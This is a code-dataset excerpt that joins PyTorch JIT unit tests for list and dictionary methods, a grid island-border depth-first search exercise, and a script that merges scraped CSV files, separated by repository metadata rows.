a.append(i)
return a == [0, 1, 2, 3, 4]
self.checkScript(test_append_loop, ())
def test_mutable_list_append_loop_if(self):
def test_append_loop_if():
a = torch.jit.annotate(List[int], [])
for i in range(5):
if i > 3:
a.append(i)
else:
a.append(0)
return a == [0, 0, 0, 0, 4]
self.checkScript(test_append_loop_if, ())
def test_mutable_list_nested_loop(self):
def test_nested_loop():
a = torch.jit.annotate(List[int], [])
for i in range(2):
for j in range(2):
a.append(i + j)
return a == [0, 1, 1, 2]
self.checkScript(test_nested_loop, ())
def test_mutable_list_function_inline(self):
@torch.jit.script
def bar(y):
# type: (List[int]) -> None
y.append(4)
@torch.jit.script
def foo():
x = [1, 2, 3]
bar(x)
return x
self.assertEqual(foo(), [1, 2, 3, 4])
def test_mutable_list_reverse_empty(self):
def test_reverse_empty():
a = []
a.reverse()
return a == []
self.checkScript(test_reverse_empty, ())
def test_mutable_list_reverse(self):
def test_reverse():
a = [1, 2, 3, 4]
a.reverse()
return a == [4, 3, 2, 1]
self.checkScript(test_reverse, ())
def test_mutable_tensor_list_reverse(self):
def test_tensor_reverse():
a = [torch.tensor(1), torch.tensor(2)]
a.reverse()
return a == [torch.tensor(2), torch.tensor(1)]
self.checkScript(test_tensor_reverse, ())
def test_mutable_list_pop_empty(self):
@torch.jit.script
def test_pop_empty():
a = torch.jit.annotate(List[int], [])
return a.pop()
with self.assertRaisesRegex(RuntimeError, "pop from empty list"):
test_pop_empty()
def test_mutable_list_pop(self):
def test_pop():
a = [1, 2, 3, 4]
b = a.pop()
return b == 4
self.checkScript(test_pop, ())
def test_mutable_list_pop2(self):
def test_pop2():
a = [1, 2, 3, 4]
b = a.pop()
return len(a) == 3
self.checkScript(test_pop2, ())
def test_mutable_list_pop_at(self):
def test_pop_at():
a = [1, 2, 3, 4]
b = a.pop(1)
return b == 2
self.checkScript(test_pop_at, ())
def test_mutable_list_pop_at2(self):
def test_pop_at2():
a = [1, 2, 3, 4]
b = a.pop(1)
return len(a) == 3
self.checkScript(test_pop_at2, ())
def test_mutable_list_pop_at_negative(self):
def test_pop_at_negative():
a = [1, 2, 3, 4]
b = a.pop(-2)
return b == 3
self.checkScript(test_pop_at_negative, ())
def test_mutable_list_pop_at_negative2(self):
def test_pop_at_negative2():
a = [1, 2, 3, 4]
b = a.pop(-2)
return len(a) == 3
self.checkScript(test_pop_at_negative2, ())
def test_mutable_list_pop_slice(self):
def test_pop_slice():
a = [1, 2, 3, 4]
b = [1, 2, 3, 4]
a.pop()
b = b[:-1]
return a == b
self.checkScript(test_pop_slice, ())
def test_mutable_list_clear_empty(self):
def test_clear_empty():
a = torch.jit.annotate(List[int], [])
a.clear()
return len(a) == 0
self.checkScript(test_clear_empty, ())
def test_mutable_list_clear(self):
def test_clear():
a = [1, 2, 3, 4]
a.clear()
return len(a) == 0
self.checkScript(test_clear, ())
def test_mutable_list_insert(self):
def test_list_insert():
a = [1, 2, 3, 4]
a.insert(2, 5)
return a == [1, 2, 5, 3, 4]
self.checkScript(test_list_insert, ())
def test_mutable_list_insert_negative(self):
def test_list_insert_negative():
a = [1, 2, 3, 4]
a.insert(-1, 5)
return a == [1, 2, 3, 5, 4]
self.checkScript(test_list_insert_negative, ())
def test_mutable_list_insert_neg_out_of_bounds(self):
def test_list_insert_neg_out_of_bounds():
a = [1, 2, 3, 4]
a.insert(-10, 5)
return a == [5, 1, 2, 3, 4]
self.checkScript(test_list_insert_neg_out_of_bounds, ())
def test_mutable_list_insert_out_of_bounds(self):
def test_list_insert_out_of_bounds():
a = [1, 2, 3, 4]
a.insert(10, 5)
return a == [1, 2, 3, 4, 5]
self.checkScript(test_list_insert_out_of_bounds, ())
def test_mutable_list_remove_not_existing(self):
@torch.jit.script
def test_list_remove_not_existing():
a = [1, 2, 3, 4]
a.remove(5)
return a
with self.assertRaisesRegex(RuntimeError, "x not in list"):
test_list_remove_not_existing()
def test_mutable_list_remove(self):
def test_list_remove():
a = [1, 2, 3, 4]
a.remove(3)
return a == [1, 2, 4]
self.checkScript(test_list_remove, ())
def test_list_index_not_existing(self):
@torch.jit.script
def list_index_not_existing():
a = [4, 1, 3, 2]
i = a.index(5)
return i
with self.assertRaisesRegex(RuntimeError, "'5' is not in list"):
list_index_not_existing()
def test_list_index(self):
def list_index():
a = [4, 1, 3, 2]
i = a.index(3)
return i == 2
self.checkScript(list_index, ())
def test_tensor_list_index(self):
def tensor_list_index():
a = [torch.tensor(4), torch.tensor(1), torch.tensor(3), torch.tensor(2)]
i = a.index(torch.tensor(3))
return i == 2
self.checkScript(tensor_list_index, ())
def test_tensor_list_index_not_existing(self):
@torch.jit.script
def tensor_list_index_not_existing():
a = [torch.tensor(4), torch.tensor(1), torch.tensor(3), torch.tensor(2)]
i = a.index(torch.tensor(5))
return i
with self.assertRaisesRegex(RuntimeError, "is not in list"):
tensor_list_index_not_existing()
def test_list_count(self):
def list_count():
a = [4, 1, 4, 2, 4]
i = a.count(4)
return i == 3
self.checkScript(list_count, ())
def test_list_count_not_existing(self):
def list_count_not_existing():
a = [4, 1, 4, 2, 4]
i = a.count(5)
return i == 0
self.checkScript(list_count_not_existing, ())
def test_tensor_list_count(self):
def tensor_list_count():
a = [torch.tensor(4), torch.tensor(1), torch.tensor(4), torch.tensor(4)]
i = a.count(torch.tensor(4))
return i == 3
self.checkScript(tensor_list_count, ())
def test_tensor_list_count_not_existing(self):
def tensor_list_count_not_existing():
a = [torch.tensor(4), torch.tensor(1), torch.tensor(4), torch.tensor(4)]
i = a.count(torch.tensor(5))
return i == 0
self.checkScript(tensor_list_count_not_existing, ())
def test_mutable_list_remove_tensor(self):
def test_list_remove_tensor():
a = [torch.ones(1), torch.zeros(1), torch.ones(2)]
a.remove(torch.zeros(1))
return len(a) == 2
self.checkScript(test_list_remove_tensor, ())
def test_mutable_list_remove2(self):
def test_list_remove2():
a = [1]
a.remove(1)
return len(a) == 0
self.checkScript(test_list_remove2, ())
def test_extend_list_mutable(self):
@torch.jit.script
def extend_list(a, b):
# type: (List[Tensor], List[Tensor]) -> List[Tensor]
a.extend(b)
return a
for l in [[], [torch.rand(2)], [torch.rand(2), torch.rand(2), torch.rand(2)]]:
for r in [[], [torch.rand(2)], [torch.rand(2), torch.rand(2), torch.rand(2)]]:
self.assertEqual(extend_list(l, r), l + r)
def test_extend_list_immutable(self):
@torch.jit.script
def extend_list(a, b):
# type: (List[int], List[int]) -> List[int]
a.extend(b)
return a
for l in [[], [1], [1, 2, 3]]:
for r in [[], [1], [1, 2, 3]]:
self.assertEqual(extend_list(l, r), l + r)
def test_copy_list_mutable(self):
@torch.jit.script
def copy_list(a):
# type: (List[Tensor]) -> List[Tensor]
return a.copy()
for l in [[], [torch.rand(2)], [torch.rand(2), torch.rand(2), torch.rand(2)]]:
self.assertEqual(copy_list(l), l)
def test_copy_list_immutable(self):
@torch.jit.script
def copy_list(a):
# type: (List[int]) -> List[int]
return a.copy()
for l in [[], [1], [1, 2, 3]]:
self.assertEqual(copy_list(l), l)
def test_min_max_single_list(self):
def min_intlist(li):
# type: (List[int]) -> int
return min(li)
def max_intlist(li):
# type: (List[int]) -> int
return max(li)
def min_boollist(li):
# type: (List[bool]) -> bool
return min(li)
def max_boollist(li):
# type: (List[bool]) -> bool
return max(li)
def min_floatlist(li):
# type: (List[float]) -> float
return min(li)
def max_floatlist(li):
# type: (List[float]) -> float
return max(li)
int_lists = [1], [2, 1, 2], [-3, 4, 2], [-2, -7, 1, 4], [2, 1, 0, 4], []
def check_list(fn, li):
if len(li) == 0:
self.checkScriptRaisesRegex(fn, (li,), Exception, "arg is an empty sequence")
else:
self.checkScript(fn, (li,))
for int_list in int_lists:
check_list(min_intlist, int_list)
check_list(max_intlist, int_list)
bool_li = list(map(lambda x: bool(x), int_list))
check_list(min_boollist, bool_li)
check_list(max_boollist, bool_li)
float_li = list(map(lambda x: float(x), int_list))
check_list(min_floatlist, float_li)
check_list(max_floatlist, float_li)
def test_to_list(self):
"""Unit tests for Tensor.tolist() function."""
"""
Boolean dtype unit tests.
"""
def to_list_bool_0D(x):
# type: (torch.Tensor) -> bool
li = torch.jit.annotate(bool, x.tolist())
return li
def to_list_bool_1D(x):
# type: (torch.Tensor) -> List[bool]
li = torch.jit.annotate(List[bool], x.tolist())
return li
def to_list_bool_2D(x):
# type: (torch.Tensor) -> List[List[bool]]
li = torch.jit.annotate(List[List[bool]], x.tolist())
return li
def to_list_bool_3D(x):
# type: (torch.Tensor) -> List[List[List[bool]]]
li = torch.jit.annotate(List[List[List[bool]]], x.tolist())
return li
self.checkScript(to_list_bool_0D, (torch.tensor(False, dtype=torch.bool),))
bool_input_1D = torch.tensor([True, False, True, False], dtype=torch.bool)
self.checkScript(to_list_bool_1D, (bool_input_1D,))
bool_input_2D = torch.tensor(
[[True, True, False], [False, True, False]], dtype=torch.bool
)
self.checkScript(to_list_bool_2D, (bool_input_2D,))
bool_input_3D = torch.tensor(
[[[True, False], [False, True]], [[True, False], [False, False]]],
dtype=torch.bool,
)
self.checkScript(to_list_bool_3D, (bool_input_3D,))
bool_input_noncontiguous = torch.tensor(
[[[True, False], [False, True]], [[True, False], [False, False]]],
dtype=torch.bool,
).transpose(0, 1)
self.checkScript(to_list_bool_3D, (bool_input_noncontiguous,))
"""
Int dtype unit tests.
"""
def to_list_int_0D(x):
# type: (torch.Tensor) -> int
li = torch.jit.annotate(int, x.tolist())
return li
def to_list_int_1D(x):
# type: (torch.Tensor) -> List[int]
li = torch.jit.annotate(List[int], x.tolist())
return li
def to_list_int_2D(x):
# type: (torch.Tensor) -> List[List[int]]
li = torch.jit.annotate(List[List[int]], x.tolist())
return li
def to_list_int_3D(x):
# type: (torch.Tensor) -> List[List[List[int]]]
li = torch.jit.annotate(List[List[List[int]]], x.tolist())
return li
self.checkScript(to_list_int_0D, (torch.tensor(1, dtype=torch.long),))
int_input_1D = torch.tensor([1, 2, 3, 4], dtype=torch.long)
self.checkScript(to_list_int_1D, (int_input_1D,))
int_input_2D = torch.tensor([[1, 2, 3], [3, 4, 5]], dtype=torch.long)
self.checkScript(to_list_int_2D, (int_input_2D,))
int_input_3D = torch.tensor(
[[[1, 2], [3, 4]], [[5, 6], [7, 8]]], dtype=torch.long
)
self.checkScript(to_list_int_3D, (int_input_3D,))
int_input_noncontiguous = torch.tensor(
[[[1, 2], [3, 4]], [[5, 6], [7, 8]]], dtype=torch.long
).transpose(0, 1)
self.checkScript(to_list_int_3D, (int_input_noncontiguous,))
"""
Float dtype unit tests.
"""
def to_list_float_0D(x):
# type: (torch.Tensor) -> float
li = torch.jit.annotate(float, x.tolist())
return li
def to_list_float_1D(x):
# type: (torch.Tensor) -> List[float]
li = torch.jit.annotate(List[float], x.tolist())
return li
def to_list_float_2D(x):
# type: (torch.Tensor) -> List[List[float]]
li = torch.jit.annotate(List[List[float]], x.tolist())
return li
def to_list_float_3D(x):
# type: (torch.Tensor) -> List[List[List[float]]]
li = torch.jit.annotate(List[List[List[float]]], x.tolist())
return li
# Test with torch.float dtype Tensors to check that they are converted to double automatically.
self.checkScript(to_list_float_0D, (torch.randn(5, dtype=torch.float)[0],))
self.checkScript(to_list_float_1D, (torch.randn(5, dtype=torch.float),))
self.checkScript(to_list_float_2D, (torch.randn(5, 6, dtype=torch.float),))
self.checkScript(to_list_float_3D, (torch.randn(5, 6, 7, dtype=torch.float),))
self.checkScript(to_list_float_3D, (torch.randn(5, 6, 7, dtype=torch.float).transpose(0, 1),))
self.checkScript(to_list_float_0D, (torch.randn(5, dtype=torch.double)[0],))
self.checkScript(to_list_float_1D, (torch.randn(5, dtype=torch.double),))
self.checkScript(to_list_float_2D, (torch.randn(5, 6, dtype=torch.double),))
self.checkScript(to_list_float_3D, (torch.randn(5, 6, 7, dtype=torch.double),))
self.checkScript(to_list_float_3D, (torch.randn(5, 6, 7, dtype=torch.double).transpose(0, 1),))
"""
Non-happy path tests:
- missing type annotation
- mismatch between type annotation and input
- type annotation with unsupported type
- type annotation with the wrong dimension
- type annotation with scalar type that doesn't match the input scalar type
"""
def to_list_missing_type_annotation(x):
# type: (torch.Tensor) -> List[float]
li = x.tolist()
return li
def to_list_incorrect_type_annotation(x):
# type: (torch.Tensor) -> List[float]
li = torch.jit.annotate(float, x.tolist())
return li
def to_list_unsupported_type_annotation(x):
# type: (torch.Tensor) -> List[float]
li = torch.jit.annotate(List[str], x.tolist())
return li
def to_list_type_annotation_wrong_dim(x):
# type: (torch.Tensor) -> List[List[float]]
li = torch.jit.annotate(List[List[float]], x.tolist())
return li
def to_list_type_annotation_incorrect_scalar_type(x):
# type: (torch.Tensor) -> List[float]
li = torch.jit.annotate(List[float], x.tolist())
return li
with self.assertRaisesRegexWithHighlight(
RuntimeError,
r"Expected type hint for result of tolist()",
"x.tolist("
):
self.checkScript(to_list_missing_type_annotation, (torch.randn(5),))
with self.assertRaisesRegexWithHighlight(
RuntimeError,
r"Return value was annotated as having type List\[float\] but is actually of type float",
"return li"
):
self.checkScript(to_list_incorrect_type_annotation, (torch.randn(5),))
with self.assertRaisesRegex(
RuntimeError, r"str is not one of the supported element types for tolist"
):
self.checkScript(to_list_unsupported_type_annotation, (torch.randn(5),))
with self.assertRaisesRegex(
RuntimeError,
r"Output annotation list dimension and runtime tensor dimension must match",
):
self.checkScript(to_list_type_annotation_wrong_dim, (torch.randn(5, dtype=torch.double),))
with self.assertRaisesRegex(
RuntimeError,
r"Output annotation element type and runtime tensor element type must match",
):
self.checkScript(
to_list_type_annotation_incorrect_scalar_type,
(torch.ones(5, dtype=torch.long),),
)
def test_to_list_gpu(self):
"""GPU tests for Tensor.tolist() function."""
if not torch.cuda.is_available() or torch.cuda.device_count() == 0:
self.skipTest("CUDA is not available")
def to_list_bool_1D(x):
# type: (torch.Tensor) -> List[bool]
li = torch.jit.annotate(List[bool], x.tolist())
return li
def to_list_int_1D(x):
# type: (torch.Tensor) -> List[int]
li = torch.jit.annotate(List[int], x.tolist())
return li
def to_list_float_1D(x):
# type: (torch.Tensor) -> List[float]
li = torch.jit.annotate(List[float], x.tolist())
return li
self.checkScript(to_list_bool_1D, (torch.tensor(
[True, False, True, False], dtype=torch.bool).cuda(),))
self.checkScript(to_list_int_1D, (torch.tensor(
[1, 2, 3, 4], dtype=torch.long).cuda(),))
self.checkScript(to_list_float_1D, (torch.randn(
5, dtype=torch.double).cuda(),))
def test_no_element_type_annotation(self):
def fn(x):
# type: (torch.Tensor) -> List
a: List = x.tolist()
return a
with self.assertRaisesRegex(RuntimeError, r"Unknown type name"):
cu = torch.jit.CompilationUnit()
cu.define(dedent(inspect.getsource(fn)))
with self.assertRaisesRegex(RuntimeError, r"Unknown type name"):
torch.jit.script(fn)
class TestDict(JitTestCase):
def dict(self):
return {u'a': torch.ones(1), u'b': torch.ones(1) + 1, u'c': torch.ones(1) + 2}
def dict2(self):
return {'x': torch.ones(1) + 100, 'y': torch.ones(1) + 101, 'z': torch.ones(1) + 102}
def test_del(self):
def inputs():
return {'hi': 2, 'bye': 3}
def fn(x):
# type: (Dict[str, int]) -> Dict[str, int]
del x['hi']
return x
python_out = fn(inputs())
# checkScript reuses the same object, but here it's being mutated so do
# it manually
cu = torch.jit.CompilationUnit()
cu.define(dedent(inspect.getsource(fn)))
self.assertEqual(cu.fn(inputs()), python_out)
self.assertEqual(torch.jit.script(fn)(inputs()), python_out)
with self.assertRaisesRegex(RuntimeError, "KeyError"):
self.checkScript(fn, [{}])
def test_keys(self):
@torch.jit.script
def keys(x):
# type: (Dict[str, Tensor]) -> List[str]
return list(x.keys())
self.assertEqual(set(keys(self.dict())), set(self.dict().keys()))
@torch.jit.script
def specialized_list():
li = {1: 1, 2: 2}.keys()
li.append(3)
return li
self.assertTrue(set(specialized_list()) == set([1, 2, 3]))
def test_values(self):
@torch.jit.script
def values(x):
# type: (Dict[str, Tensor]) -> List[Tensor]
return list(x.values())
the_dict = self.dict()
self.assertEqual(set(values(the_dict)), set(the_dict.values()))
def test_len(self):
def length(x):
# type: (Dict[str, Tensor]) -> int
return len(x)
self.checkScript(length, (self.dict(),))
def test_copy(self):
def func(x):
# type: (Dict[str, Tensor]) -> Dict[str, Tensor]
return x.copy()
self.checkScript(func, (self.dict(),))
def test_items(self):
def func(x):
# type: (Dict[str, Tensor]) -> List[Tuple[str, Tensor]]
return x.items()
# The value returned by Python is in arbitrary order, so we can't use
# checkScript
scripted_func = torch.jit.script(func)
eager_out = (func(self.dict()))
script_out = (scripted_func(self.dict()))
self.assertEqual(len(eager_out), len(script_out))
for item in eager_out:
self.assertTrue(item in script_out)
def test_pop(self):
def pop(x, key):
# type: (Dict[str, Tensor], str) -> Tuple[Tensor, Dict[str, Tensor]]
return x.pop(key), x
# checkScript doesn't copy the inputs, so we can't use it since this mutates
# the dict
def tester(fn, *args):
eager_out = fn(self.dict(), *args)
script_out = torch.jit.script(fn)(self.dict(), *args)
self.assertEqual(eager_out, script_out)
tester(pop, 'a')
with self.assertRaisesRegex(RuntimeError, "KeyError"):
torch.jit.script(pop)(self.dict(), 'x')
def default_pop(x, key, default):
# type: (Dict[str, Tensor], str, Tensor) -> Tuple[Tensor, Dict[str, Tensor]]
return x.pop(key, default), x
tester(default_pop, 'a', torch.randn(2, 2))
tester(default_pop, 'x', torch.randn(2, 2))
def test_setdefault(self):
def setdefault(x, key, default):
# type: (Dict[str, Tensor], str, Tensor) -> Dict[str, Tensor]
x.setdefault(key, default)
return x
self.checkScript(setdefault, (self.dict(), 'a', torch.randn(2, 2)))
self.checkScript(setdefault, (self.dict(), 'nonexistant', torch.randn(2, 2)))
def test_update(self):
def update(a, b):
# type: (Dict[str, Tensor], Dict[str, Tensor]) -> Tuple[Dict[str, Tensor], Dict[str, Tensor]]
a.update(b)
return a, b
self.checkScript(update, (self.dict(), self.dict()))
self.checkScript(update, (self.dict(), self.dict2()))
def test_aug_assign(self):
def aug_assign_dict_tensor(a):
# type: (Dict[str, Tensor]) -> Dict[str, Tensor]
a['a'] += 1
a['b'] -= 12
a['c'] *= 122
a['c'] /= 2
a['c'] %= 2
return a
def aug_assign_dict_prim(a):
# type: (Dict[str, float]) -> Dict[str, float]
a['a'] += 3.4
a['b'] -= 2.4
a['c'] *= 3.0
a['c'] /= 2.0
a['c'] %= 2.0
return a
self.checkScript(aug_assign_dict_tensor, (self.dict(),))
self.checkScript(aug_assign_dict_prim, ({'a': 3.0, 'b': 2.0, 'c': 4.0},))
def test_popitem(self):
@torch.jit.script
def popitem(x):
# type: (Dict[str, Tensor]) -> Tuple[Tuple[str, Tensor], Dict[str, Tensor]]
item = x.popitem()
return item, x
# The value returned by Python is arbitrary, so we can't use checkScript
eager_in = self.dict()
eager_out = (eager_in.popitem(), eager_in)
script_out = popitem(self.dict())
# Check that an item was removed
self.assertEqual(len(eager_out[1]), len(script_out[1]))
# Check that the item is the correct types
self.assertTrue(isinstance(script_out[0][0], str))
self.assertTrue(isinstance(script_out[0][1], torch.Tensor))
def test_clear(self):
def clear(x):
# type: (Dict[str, Tensor]) -> Dict[str, Tensor]
x.clear()
return x
self.checkScript(clear, (self.dict(),))
def test_get(self):
def get(x, key):
# type: (Dict[str, Tensor], str) -> Optional[Tensor]
return x.get(key)
self.checkScript(get, (self.dict(), 'a'))
self.checkScript(get, (self.dict(), "doesn't exist"))
def get_default(x, key):
# type: (Dict[str, Tensor], str) -> Optional[Tensor]
return x.get(key, torch.randn(2, 2))
self.checkScript(get, (self.dict(), 'a'))
self.checkScript(get, (self.dict(), "doesn't exist"))
def test_basic(self):
def simple(x):
# type: (Dict[str, int]) -> Dict[str, int]
return x
self.checkScript(simple, ({'item': 20, 'other_item': 120},))
def index(x):
# type: (Dict[str, int]) -> int
return x['item']
self.checkScript(index, ({'item': 20, 'other_item': 120},))
def type_default():
# type: () -> Dict[str, Tensor]
return {}
self.checkScript(type_default, ())
@torch.jit.script
def missing_index(x):
# type: (Dict[str, int]) -> int
return x['dne']
with self.assertRaisesRegex(RuntimeError, "KeyError"):
missing_index({'item': 20, 'other_item': 120})
code = dedent('''
def literal1():
return torch.jit.annotate(Dict[int, float], {})
def literal2():
return torch.jit.annotate(Dict[int, float], {10: 1.2})
''')
cu = torch.jit.CompilationUnit(code)
self.assertEqual({}, cu.literal1())
self.assertEqual({10: 1.2}, cu.literal2())
cu = torch.jit.CompilationUnit(dedent('''
def literal3():
return torch.jit.annotate(Dict[int, float], {10: 1.2, 11: 1.3})
'''))
self.assertEqual({10: 1.2, 11: 1.3}, cu.literal3())
def list_of_dicts():
# type: () -> List[Dict[str, Tensor]]
return [{'word': torch.ones(2) + 3}, {'other word': torch.ones(1) + 2}]
self.checkScript(list_of_dicts, ())
def test_mutability(self):
@torch.jit.script
def fn():
# type: () -> Dict[str, int]
a = torch.jit.annotate(Dict[str, int], {})
a['ok'] = 10
return a
self.assertEqual(fn(), {'ok': 10})
def test_key_type(self):
with self.assertRaisesRegex(RuntimeError, "but instead found type"):
@torch.jit.script
def fn(a):
# type: (Dict[str, int]) -> int
return a[None]
def test_loop(self):
@torch.jit.script
def fn(x):
# type: (int) -> Dict[str, int]
a = torch.jit.annotate(Dict[str, int], {})
for i in range(x):
a['ok'] = i
return a
self.assertEqual(fn(10), {'ok': 9})
def test_view(self):
def fn(x, y):
l = {"a": x}
x_view = l["a"]
a = x + x
x_view.add_(y)
b = x + x
return a == b
self.checkScript(fn, (torch.rand(2, 3), torch.rand(2, 3)))
def test_membership(self):
def fn(x, y):
# type: (Dict[int, int], int) -> int
return x.get(y, 3)
d = {1: 2, 3: 4}
self.checkScript(fn, (d, 3))
self.checkScript(fn, (d, 2))
def optional(x, y):
# type: (Dict[int, int], int) -> bool
res = x.get(y)
return res is None
self.checkScript(fn, (d, 3))
self.checkScript(fn, (d, 2))
with self.assertRaisesRegex(RuntimeError, "is actually of type Optional"):
@torch.jit.script
def bad_types(x, y):
# type: (Dict[int, int], int) -> int
return x.get(y) # noqa: T484
def test_dict_to_python(self):
@torch.jit.ignore
def python_lookup(my_dict, keys):
# type: (Dict[str, int], List[str]) -> List[int]
return [my_dict[k] for k in keys]
def fn(my_dict, keys):
# type: (Dict[str, int], List[str]) -> List[int]
return python_lookup(my_dict, keys)
a_dict = {'a': torch.ones(1), 'b': torch.ones(1) + 1, 'c': torch.ones(1) + 2}
self.checkScript(fn, (a_dict, ('a', 'c')))
def test_ordered_dict(self):
def test_func(fn, inputs):
self.assertEqual(fn(*inputs), torch.jit.script(fn)(*inputs))
def repeated_key():
return OrderedDict([(1, 2), (2, 3), (1, 4)])
test_func(repeated_key, ())
def no_args():
a = OrderedDict()
a["one"] = torch.tensor(1)
a["two"] = torch.tensor(2)
test_func(no_args, ())
def test_dict_constructor():
a = dict()
a["one"] = torch.tensor(1)
return a, dict([(1, 2), (2, 3), (1, 4)]) # noqa: C406
test_func(test_dict_constructor, ())
def test_dict_error():
a = dict()
a[1] = 2
return a
with self.assertRaisesRegex(Exception, "Arguments for call are not"):
torch.jit.script(test_dict_error)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
1b17aeab88cd05b937fdf0af926cdd3a0dc7c52c | d076c40c36685a985958c5ba7e14761a966cf333 | /interview/set_border.py | eddcf7e62cacdab707be8571c7f378e1ce940ab8 | [] | no_license | yehongyu/acode | e65eb230210c657b8c5e4d5928cbe9437f77d717 | 176cc1db3291843fb068f06d0180766dd8c3122c | refs/heads/master | 2023-04-20T14:27:45.123969 | 2021-05-08T04:36:39 | 2021-05-08T04:36:39 | 365,412,513 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,319 | py | def dfs2(grid, i, j):
m = len(grid)
n = len(grid[0])
directions = [[0,1], [0,-1], [1,0], [-1,0]]
is_border = False
for direct in directions:
ni = i + direct[0]
nj = j + direct[1]
if ni<0 or nj<0 or ni>=m or nj>=n:
is_border = True
continue
if grid[ni][nj] == 0:
is_border = True
continue
if grid[ni][nj] in [2, 3]:
continue
grid[ni][nj] = 3
dfs2(grid, ni, nj)
if is_border == True:
grid[i][j] = 2
'''
0: water,
1: island
2: is island, visited, border of island
3: is island, visited, not border
border island: 1-->3-->2
not border: 1-->3-->1
'''
def set_border(grid):
m = len(grid)
if m <= 0: return 0
n = len(grid[0])
if n<= 0: return 0
count = 0; visited = set()
for i in range(m):
for j in range(n):
if grid[i][j] == 1:
grid[i][j] = 3
dfs2(grid, i, j)
count += 1
for i in range(m):
for j in range(n):
if grid[i][j] == 3:
grid[i][j] = 1
grid = [
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 0, 0, 1],
[0, 1, 1, 1, 1, 0, 1, 1],
[0, 0, 1, 1, 1, 0, 1, 1,],
[0, 0, 0, 0, 0, 0, 0, 0]
]
set_border(grid)
for val in grid:
print(val)
| [
"aodandan@bytedance.com"
] | aodandan@bytedance.com |
fc6c2ceeb4e6a0231c0cd453449b3182c0f64351 | 60814a33c10069ac92f2621463bfa0acfed16f7e | /购物类/Half_ebay/file_os.py | 4c24ad575b0c3493c65936b6fceff97e86198b79 | [] | no_license | ijt0walle/LiuFan_Spider | 967138c79bb4f6097fb8d898892a02c5fd6a454c | 25c07e7d594a835d123530bb49bce77a5bd7f662 | refs/heads/master | 2021-01-25T13:18:28.306502 | 2017-08-15T02:32:08 | 2017-08-15T02:32:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,755 | py | import os
def qvzong():
for i in os.listdir('/home/ytroot/桌面/Update_file/'):
with open('/home/ytroot/桌面/Update_file/'+i,'r') as asin_file:
with open('/home/ytroot/桌面/Update_file/zong_file.txt','a') as zong:
zong.write(asin_file.read())
with open('/home/ytroot/桌面/WorkSpaceLHW/Half.ebay/Data/snatch/total_asin.txt','r') as total_file:
total_all = total_file.readlines()
total = []
for tt in total_all:
total.append(tt.replace('\n',''))
print (len(total))
with open('/home/ytroot/桌面/Update_file/zong_file.txt','r') as zong_file:
muyqian_all = zong_file.readlines()
muyqian = []
for zz in muyqian_all:
muyqian.append(zz.replace('\r','').replace('\n',''))
print (len(muyqian))
last = list(set(total) - set(muyqian))
print (len(last))
print (len(list(set(total)&set(muyqian))))
with open('/home/ytroot/桌面/Update_file/last.txt','a') as last_file:
for ll in last:
last_file.write(ll+'\n')
'''把每天抓取的文件合成一份'''
def Hebing():
on_shelf = '/home/ytroot/桌面/onshelf_info.csv'
half_info = '/home/ytroot/桌面/half_info.csv'
not_crawl = '/home/ytroot/桌面/not_crawl.txt'
on_shelf_file = open(on_shelf,'aw')
half_info_file = open(half_info,'aw')
# not_crawl_file = open(not_crawl,'aw')
on_shelf_list = []
for item1 in open('/home/ytroot/桌面/info/onshelf_info1.csv','r').readlines():
item1 = item1.split('\n')[0]
on_shelf_list.append(item1)
for item2 in open('/home/ytroot/桌面/info/onshelf_info2.csv','r').readlines():
item2 = item2.split('\n')[0]
on_shelf_list.append(item2)
for item3 in open('/home/ytroot/桌面/info/onshelf_info3.csv', 'r').readlines():
item3 = item3.split('\n')[0]
on_shelf_list.append(item3)
for item4 in open('/home/ytroot/桌面/info/onshelf_info4.csv','r').readlines():
item4 = item4.split('\n')[0]
on_shelf_list.append(item4)
for item5 in open('/home/ytroot/桌面/info/onshelf_info5.csv','r').readlines():
item5 = item5.split('\n')[0]
on_shelf_list.append(item5)
for item6 in open('/home/ytroot/桌面/info/onshelf_info6.csv','r').readlines():
item6 = item6.split('\n')[0]
on_shelf_list.append(item6)
for item7 in open('/home/ytroot/桌面/info/onshelf_info7.csv','r').readlines():
item7 = item7.split('\n')[0]
on_shelf_list.append(item7)
for item8 in open('/home/ytroot/桌面/info/onshelf_info8.csv','r').readlines():
item8 = item8.split('\n')[0]
on_shelf_list.append(item8)
for item9 in open('/home/ytroot/桌面/info/onshelf_info9.csv','r').readlines():
item9 = item9.split('\n')[0]
on_shelf_list.append(item9)
for item_z in on_shelf_list:
on_shelf_file.write(item_z+'\n')
half_info_list = []
for item1 in open('/home/ytroot/桌面/info/half_info1.csv', 'r').readlines():
item1 = item1.split('\n')[0]
half_info_list.append(item1)
for item2 in open('/home/ytroot/桌面/info/half_info2.csv', 'r').readlines():
item2 = item2.split('\n')[0]
half_info_list.append(item2)
for item3 in open('/home/ytroot/桌面/info/half_info3.csv', 'r').readlines():
item3 = item3.split('\n')[0]
half_info_list.append(item3)
for item4 in open('/home/ytroot/桌面/info/half_info4.csv', 'r').readlines():
item4 = item4.split('\n')[0]
half_info_list.append(item4)
for item5 in open('/home/ytroot/桌面/info/half_info5.csv', 'r').readlines():
item5 = item5.split('\n')[0]
half_info_list.append(item5)
for item6 in open('/home/ytroot/桌面/info/half_info6.csv', 'r').readlines():
item6 = item6.split('\n')[0]
half_info_list.append(item6)
for item7 in open('/home/ytroot/桌面/info/half_info7.csv', 'r').readlines():
item7 = item7.split('\n')[0]
half_info_list.append(item7)
for item8 in open('/home/ytroot/桌面/info/half_info8.csv', 'r').readlines():
item8 = item8.split('\n')[0]
half_info_list.append(item8)
for item9 in open('/home/ytroot/桌面/info/half_info9.csv', 'r').readlines():
item9 = item9.split('\n')[0]
half_info_list.append(item9)
for item_y in half_info_list:
half_info_file.write(item_y + '\n')
# not_crawl_list = []
# for item1 in open('/home/ytroot/桌面/info/not_crawl1.txt', 'r').readlines():
# item1 = item1.split('\n')[0]
# not_crawl_list.append(item1)
# for item2 in open('/home/ytroot/桌面/info/not_crawl2.txt', 'r').readlines():
# item2 = item2.split('\n')[0]
# not_crawl_list.append(item2)
# for item3 in open('/home/ytroot/桌面/info/not_crawl3.txt', 'r').readlines():
# item3 = item3.split('\n')[0]
# not_crawl_list.append(item3)
# for item4 in open('/home/ytroot/桌面/info/not_crawl4.txt', 'r').readlines():
# item4 = item4.split('\n')[0]
